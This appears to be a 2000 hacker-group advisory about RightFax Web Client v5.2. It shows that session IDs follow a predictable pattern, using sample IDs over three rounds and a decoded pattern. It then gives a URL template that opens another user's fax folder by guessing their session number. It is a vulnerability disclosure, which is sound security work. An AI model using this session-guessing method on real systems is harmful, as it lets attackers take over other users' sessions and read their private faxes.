[LoWNOISE Colombia 2000] +---[RightFax Web Client v5.2: Hijack user's sessions] +---[Description] Using your web browser When you click to log on to the rightfax server, it opens a new window. In that window you are asked for a username and password. The Toolbar on the browser is hidden, but if you open the location toolbar (Netscape: view/show/location toolbar) you will see something like this: http://RIGHTFAXHOST/rightfax/fuwww.dll/c=urol2zi29uncz0/?load1 c=urol2zi29uncz0 <-- This is a session number If you make some conections you will have: [round 1] c=ur o l 2 zi29u n c z0 c=ur q 2 1 zi29u n t z0 c=ur r i 0 zi29u p 3 z0 c=ur s x y zi29u p k z0 c=ur u e x zi29u q 6 z0 c=ur v u w zi29u q q z0 c=ur x b v zi29u r 8 z0 c=ur y r u zi29u r p z0 c=us 1 8 t zi29u s 7 z0 c=us 2 o s zi29u s q z0 c=us 4 5 r zi29u t 5 z0 c=us 5 l q zi29u t k z0 c=us 7 2 p zi29u u 1 z0 c=us 8 i o zi29u u f z0 c=us 9 y n zi29u u x z0 c=us b f m zi29u w c z0 [round 2] c=us b f m zi29v 4 j z0 c=us c v l zi29v 4 x z0 c=us e c k zi29v 5 b z0 c=us f s j zi29v 5 p z0 c=us h 9 i zi29v 6 3 z0 c=us i p h zi29v 6 h z0 c=us k 6 g zi29v 6 y z0 c=us l m f zi29v 7 f z0 c=us n 3 e zi29v 7 r z0 c=us o j d zi29v 8 7 z0 c=us q 0 c zi29v 8 q z0 c=us r g b zi29v 9 4 z0 c=us s w a zi29v 9 o z0 [round 3] c=ur l o 4 zi29v a 5 z0 c=ur n 5 3 zi29v a k z0 c=ur o l 2 zi29v b 6 z0 c=ur q 2 1 zi29v b k z0 c=ur s x y zi29v b x z0 c=ur u e x zi29v c c z0 c=ur v u w zi29v c r z0 c=ur x b v zi29v d 8 z0 c=ur y r u zi29v d y z0 xxxx a r b xxxxx d r xx x = the same for all the round a = a-z,0-9 r = (the next letter from the previous round) b = 9-0,z-a d = double (aa-zz,00-99) THATS NO RANDOM. So you can guess other users session numbers. So Unhide the location toolbar and make this URL: http://RIGHTFAXHOST/rightfax/fuwww.dll/c=other-session-number/?FOLDR&FFFF +---[THE END] Efrain 'ET' Torres et@cyberspace.org [LoWNOISE] Colombia 2000 No human rights reserved@, narco-guerrilla.gov.co sucks.